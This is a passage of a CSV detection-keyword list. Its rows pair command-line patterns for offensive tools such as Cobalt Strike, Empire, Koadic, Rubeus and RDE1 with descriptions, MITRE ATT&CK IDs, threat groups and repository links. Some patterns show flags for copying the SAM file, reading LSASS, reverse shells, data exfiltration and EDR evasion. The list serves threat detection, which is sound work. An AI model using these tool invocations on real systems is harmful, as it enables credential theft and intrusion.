Access,https://github.com/p0dalirius/pyLAPS,1,0,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z -* pypykatz*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* pywsus.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -q -r karma.rc_.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* qconn-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* qscan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* quake1-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* quake3-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* quake3-master-getservers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -r data/* -p * -m readfiles*portscan*,offensive_tool_keyword,SSRFmap,Automatic SSRF fuzzer and exploitation tool,T1210 - T1211 - T1212 - T1574,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/swisskyrepo/SSRFmap,1,0,N/A,N/A,10,2463,459,2023-05-27T19:30:08Z,2018-10-15T19:08:26Z -* radare *:* -ble*,offensive_tool_keyword,RadareEye,Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Network Exploitation tools,https://github.com/souravbaghz/RadareEye,1,0,N/A,N/A,4,338,50,2021-12-11T06:16:37Z,2021-01-07T04:52:58Z -* rai-attack-dns*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -* rai-attack-http*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -* --random_user_agent*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* --random-agent *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* rarce.py*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -* rasman.exe*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -* -ratel *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* RCE.py -*,offensive_tool_keyword,poc,Windows Message Queuing vulnerability exploitation with custom payloads,T1192 - T1507,TA0002,N/A,N/A,Network Exploitation Tools,https://github.com/Hashi0x/PoC-CVE-2023-21554,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rde1 crde_windows*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rde1 srde_linux*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rde1 srde_macos*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rde1 srde_windows*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rdp * -u * -p * --nla-screenshot*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* rdp-enum-encryption.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rdp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rdp-vuln-ms12-020.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ReadFromLsass*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,0,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -* -RealCmdLine *,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,0,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -* -RealCmdLine *,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -* realvnc-auth-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rec2 crde_linux*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rec2 crde_macos*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* redis-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* redis-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* redsocks.sh*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -* --reflective-injection *,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -* -Registry -AtStartup *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -relayserver *:5555*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -* -remote -bindPipe * -bindPort * -security*,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,0,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -* -Remote -ExchHostname *,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,0,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -* -RemoteDllHandle *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -remotefilepath *\\*.wav*,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,0,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -* --remote-impersonation*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,0,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* renew *.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* renew */ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* repo -u https://github.com/*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -* req -username * -p * -ca * -target * -template * -upn *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -request -dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -request -format hashcat -outputfile *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --requirement *Exegol/requirements.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* resolveall.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* resu ten*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed net user,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rev_shell.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -* -Reverse -IPAddress * -Port *,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the 